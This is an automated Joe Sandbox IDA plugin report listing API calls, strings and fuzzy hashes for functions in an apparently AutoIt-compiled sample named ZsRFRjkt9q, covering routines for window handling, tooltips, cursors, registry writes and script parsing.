Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 9355b7a405f75734133f69bda2ea238e73e970d0ac60bb39018eb4c72ac427e4
Instruction ID: 105667823e2cecf89bff1c6361f5e2b3764f8dc26707848e41da29b8269f068d
Opcode Fuzzy Hash: 9355b7a405f75734133f69bda2ea238e73e970d0ac60bb39018eb4c72ac427e4
Instruction Fuzzy Hash: CAE191B4900218ABDB109F55CC84EEF7B78EF05714F10816BF915EA291E7789981CFAA

Function 00402EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00402F7A
IsWindow.USER32(?), ref: 004722FD

Strings

L+K, xrefs: 004721B2
ALL, xrefs: 00472264
TITLE, xrefs: 00472292
T+K, xrefs: 0047220E
INSTANCE, xrefs: 0047223C
CLASS, xrefs: 00472128
REGEXPTITLE, xrefs: 004720F8
REGEXPCLASS, xrefs: 00472149
ACTIVE, xrefs: 004720CC
HANDLE, xrefs: 004720E2
P+K, xrefs: 004721E0
H+K, xrefs: 00472184
LAST, xrefs: 004720B6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+K$HANDLE$INSTANCE$L+K$LAST$P+K$REGEXPCLASS$REGEXPTITLE$T+K$TITLE
API String ID: 62970417-967414542
Opcode ID: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
Instruction ID: 19b6f70e54dbd00de2fe89bce1193ca9c500e92799cd443801b945e85138c81e
Opcode Fuzzy Hash: 8ae1bfae7b80860eb0af29db6db4c902a5bd03220a78b2ae786aa40ba18cd814
Instruction Fuzzy Hash: 29D1B9305086439BCB04DF21CA419DABBA4FF54344F00892FF459671E2DB78E99ADBD9

Function 0046764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0046778A
GetDesktopWindow.USER32 ref: 0046779F
GetWindowRect.USER32(00000000), ref: 004677A6
GetWindowLongW.USER32(?,000000F0), ref: 00467808
DestroyWindow.USER32(?), ref: 00467834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0046785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004678A1
SendMessageW.USER32(?,00000421,?,?), ref: 004678B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004678C9
IsWindowVisible.USER32(?), ref: 004678E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00467904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00467918
GetWindowRect.USER32(?,?), ref: 00467930
MonitorFromPoint.USER32(?,?,00000002), ref: 00467956
GetMonitorInfoW.USER32 ref: 00467970
CopyRect.USER32(?,?), ref: 00467987
SendMessageW.USER32(?,00000412,00000000), ref: 004679F2

Strings

0, xrefs: 00467735
tooltips_class32, xrefs: 00467856
(, xrefs: 00467965

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
Instruction ID: 6fd286384aed1c985e01992562759e80b587d685e8a57b14d478fdb94f0a8a73
Opcode Fuzzy Hash: 3581649c7171f8e12fd73d59a0377c3b1bab844ebbdadb8757991bc42abdba2f
Instruction Fuzzy Hash: 36B16E71608301AFD704DF65C948B5ABBE5FF88314F00892EF599AB291E774EC05CB9A

Function 0041A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A939
GetSystemMetrics.USER32(00000007), ref: 0041A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041A96C
GetSystemMetrics.USER32(00000008), ref: 0041A974
GetSystemMetrics.USER32(00000004), ref: 0041A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0041A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0041A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0041A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0041AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0041AA2B
GetStockObject.GDI32(00000011), ref: 0041AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0041AA52

Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F

SetTimer.USER32(00000000,00000000,00000028,0041AB87), ref: 0041AA79

Strings

AutoIt v3 GUI, xrefs: 0041A9F1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
Instruction ID: 772b70500764f947b2549a3380184186526abbf3af67c980f925d5c2611f14e1
Opcode Fuzzy Hash: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
Instruction Fuzzy Hash: 31B14F71A0120A9FDB14DFA8DC45BEE7BB4FF08314F11422AFA15A62E0D7789891CB59

Function 00463639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00463735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0049DC00,00000000,?,00000000,?,?), ref: 004637A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004637EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00463874
RegCloseKey.ADVAPI32(?), ref: 00463B94
RegCloseKey.ADVAPI32(00000000), ref: 00463BA1

Strings

REG_QWORD, xrefs: 00463AE2
REG_MULTI_SZ, xrefs: 0046395C
REG_SZ, xrefs: 004638B2
REG_DWORD, xrefs: 00463A65
REG_EXPAND_SZ, xrefs: 00463811
REG_BINARY, xrefs: 00463B2F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 846b4e76aa58ba0a3af467e772e0b84d1e5405eece07c09e9d90d3262a585ea1
Instruction ID: 94f16537412128840b1b23fcea22bb683396cf897e5eede4ab9d45138d76c91a
Opcode Fuzzy Hash: 846b4e76aa58ba0a3af467e772e0b84d1e5405eece07c09e9d90d3262a585ea1
Instruction Fuzzy Hash: C8026F756006019FCB14DF25C851A1EB7E5FF88714F04846EF9899B3A2DB38ED41CB8A

Function 00466BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00466C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00466D16

Strings

SELECTCLEAR, xrefs: 00466D8D
VIEWCHANGE, xrefs: 00466ECD
GETITEMCOUNT, xrefs: 00466C84
GETTEXT, xrefs: 00466CBF
GETSELECTED, xrefs: 00466E3C
FINDITEM, xrefs: 00466E81
GETSUBITEMCOUNT, xrefs: 00466CA1
SELECTALL, xrefs: 00466D75
GETSELECTEDCOUNT, xrefs: 00466CF9
DESELECT, xrefs: 00466DFC
SELECT, xrefs: 00466DA8
SELECTINVERT, xrefs: 00466DDE
ISSELECTED, xrefs: 00466D21

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 25827ff6fd62e69c30516841602535ae5e4ea737b77c996f837d4cff45305b23
Instruction ID: efac7140647597b4e0a4d800608fbc95c45418c52914f72453b713750b31682f
Opcode Fuzzy Hash: 25827ff6fd62e69c30516841602535ae5e4ea737b77c996f837d4cff45305b23
Instruction Fuzzy Hash: 80A1A7742042419FCB14EF25C951A6BB3A5FF84318F11496FB856673D2EB38EC06CB9A

Function 0043CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0043CF91
__swprintf.LIBCMT ref: 0043D032
_wcscmp.LIBCMT ref: 0043D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0043D09A
_wcscmp.LIBCMT ref: 0043D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0043D10D
GetDlgCtrlID.USER32(?), ref: 0043D15F
GetWindowRect.USER32(?,?), ref: 0043D195
GetParent.USER32(?), ref: 0043D1B3
ScreenToClient.USER32(00000000), ref: 0043D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0043D234
_wcscmp.LIBCMT ref: 0043D248
GetWindowTextW.USER32(?,?,00000400), ref: 0043D26E
_wcscmp.LIBCMT ref: 0043D282

Strings

%s%u, xrefs: 0043D02C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 1c52813d1dd22c810bf321a69279f4fa802cf737a72b6e5702cafbb6e43a2120
Instruction ID: 24840aa67b1d37cee4f9ed2b757ca5224d0e7bcabf0401134b637d571f0a2458
Opcode Fuzzy Hash: 1c52813d1dd22c810bf321a69279f4fa802cf737a72b6e5702cafbb6e43a2120
Instruction Fuzzy Hash: D6A1E271A04306AFD714DF64E884FABB7A8FF48354F00492BF95993290DB38EA45CB95

Function 0043D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0043D8EB
_wcscmp.LIBCMT ref: 0043D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0043D924
CharUpperBuffW.USER32(?,00000000), ref: 0043D941
_wcscmp.LIBCMT ref: 0043D95F
_wcsstr.LIBCMT ref: 0043D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0043D9A8
_wcscmp.LIBCMT ref: 0043D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0043D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0043DA28
_wcscmp.LIBCMT ref: 0043DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0043DA60
GetWindowRect.USER32(00000004,?), ref: 0043DAC9

Strings

@, xrefs: 0043D8C6
ThumbnailClass, xrefs: 0043D9B3, 0043DA33

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 57eaeece17d193142035803e19f4c8271cdf4de3042e5770e13f33008b5824d2
Instruction ID: eb4b748b181ce7837a0a3d84f11938d7b11684f0c71fda1ffb2743c464e57e2d
Opcode Fuzzy Hash: 57eaeece17d193142035803e19f4c8271cdf4de3042e5770e13f33008b5824d2
Instruction Fuzzy Hash: 9681D2714083059BDB04DF10E981FAB7BA8EF48308F04546FFD899A196DB38ED45CBA9

Function 0043D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0043D753

Strings

ACTIVE, xrefs: 0043D72E
[CLASS:, xrefs: 0043D7A3
[HANDLE:, xrefs: 0043D75F
ALL, xrefs: 0043D7E7
[REGEXPTITLE:, xrefs: 0043D77B
HANDLE=, xrefs: 0043D74C
REGEXP=, xrefs: 0043D768
[ACTIVE, xrefs: 0043D740
LAST, xrefs: 0043D718
[LAST, xrefs: 0043D800
[ALL, xrefs: 0043D7F9
CLASSNAME=, xrefs: 0043D790

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
Instruction ID: 668cfd7b102cdb3b06fc8f50abdc480de79f1751c551137aa4085a6d09ebe7cd
Opcode Fuzzy Hash: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
Instruction Fuzzy Hash: C4318F31A44205A6DA18FA61EE53FEE73749F24708F70012FF412710D1EFADBA14866D

Function 0043EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0043EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0043EAC2
SetWindowTextW.USER32(?,?), ref: 0043EAD9
GetDlgItem.USER32(?,000003EA), ref: 0043EAEE
SetWindowTextW.USER32(00000000,?), ref: 0043EAF4
GetDlgItem.USER32(?,000003E9), ref: 0043EB04
SetWindowTextW.USER32(00000000,?), ref: 0043EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0043EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0043EB45
GetWindowRect.USER32(?,?), ref: 0043EB4E
SetWindowTextW.USER32(?,?), ref: 0043EBB9
GetDesktopWindow.USER32 ref: 0043EBBF
GetWindowRect.USER32(00000000), ref: 0043EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0043EC12
GetClientRect.USER32(?,?), ref: 0043EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0043EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0043EC6F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
Instruction ID: 76431d1e8bf3edbe85f4478968f4af4cc14dd66677a52f7337c03f4cbddb23bd
Opcode Fuzzy Hash: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
Instruction Fuzzy Hash: 21514C71901709AFDB21EFA9CD85E6EBBB5FF08704F00492DE586A26E0D774A905CB14

Function 004579B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 004579C6
LoadCursorW.USER32(00000000,00007F00), ref: 004579D1
LoadCursorW.USER32(00000000,00007F03), ref: 004579DC
LoadCursorW.USER32(00000000,00007F8B), ref: 004579E7
LoadCursorW.USER32(00000000,00007F01), ref: 004579F2
LoadCursorW.USER32(00000000,00007F81), ref: 004579FD
LoadCursorW.USER32(00000000,00007F88), ref: 00457A08
LoadCursorW.USER32(00000000,00007F80), ref: 00457A13
LoadCursorW.USER32(00000000,00007F86), ref: 00457A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00457A29
LoadCursorW.USER32(00000000,00007F85), ref: 00457A34
LoadCursorW.USER32(00000000,00007F82), ref: 00457A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00457A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00457A55
LoadCursorW.USER32(00000000,00007F02), ref: 00457A60
LoadCursorW.USER32(00000000,00007F89), ref: 00457A6B
GetCursorInfo.USER32(?), ref: 00457A7B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: bbaa7a165c13fa0a2e711beefe9cfe2d29931bb2c56d606473d63680cec3d242
Instruction ID: cf069056e3f50e332e53d565adb2054a650a155eab991a62512326a223ee644b
Opcode Fuzzy Hash: bbaa7a165c13fa0a2e711beefe9cfe2d29931bb2c56d606473d63680cec3d242
Instruction Fuzzy Hash: F43117B0D083196ADB109FB69C8995FBFE8FF04750F50453BA50DE7281DA7CA9048F95

Function 0040C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0041E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0040C8B7,?,00002000,?,?,00000000,?,0040419E,?,?,?,0049DC00), ref: 0041E984

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

__wsplitpath.LIBCMT ref: 0040C93E

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscpy.LIBCMT ref: 0040C953
_wcscat.LIBCMT ref: 0040C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0040CABE

Part of subcall function 0040B337: _wcscpy.LIBCMT ref: 0040B36F

Strings

Unterminated string, xrefs: 00473470
>>>AUTOIT SCRIPT<<<, xrefs: 0047311B
Error opening the file, xrefs: 004730B4, 0047313D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00473098
Bad directive syntax error, xrefs: 00473429
EA06, xrefs: 004730C9
AU3!, xrefs: 0040C90C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 11d71682ce8efcd4399bcf69de37f918f41a2b51ca92baea902f0af68c33b4a2
Instruction ID: 140721dde5c93db0a4831f506c98d94b1ca13cdcddd4f68ebbd5b188d2806d8f
Opcode Fuzzy Hash: 11d71682ce8efcd4399bcf69de37f918f41a2b51ca92baea902f0af68c33b4a2
Instruction Fuzzy Hash: C3129171508341DFC724DF25C881AAFBBE5AF98308F40492FF589A3291DB38D949DB5A

Function 0046CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046CEFB
DestroyWindow.USER32(?,?), ref: 0046CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0046CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0046D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D025
DestroyWindow.USER32(?), ref: 0046D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0046D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D094
GetDesktopWindow.USER32 ref: 0046D0A9
GetWindowRect.USER32(00000000), ref: 0046D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0046D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0046D0DA

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

Strings

tooltips_class32, xrefs: 0046CFED, 0046D06E
0, xrefs: 0046CF1B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
Instruction ID: 4dc2e84ce978025e6b17c84472f7ac8ce1a7427ed809a84a7c26ecdd8771ffc4
Opcode Fuzzy Hash: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
Instruction Fuzzy Hash: 6C71BF70A40305AFD720CF28CC85F6A77E5EB89708F14452EF985973A1E738E942CB5A

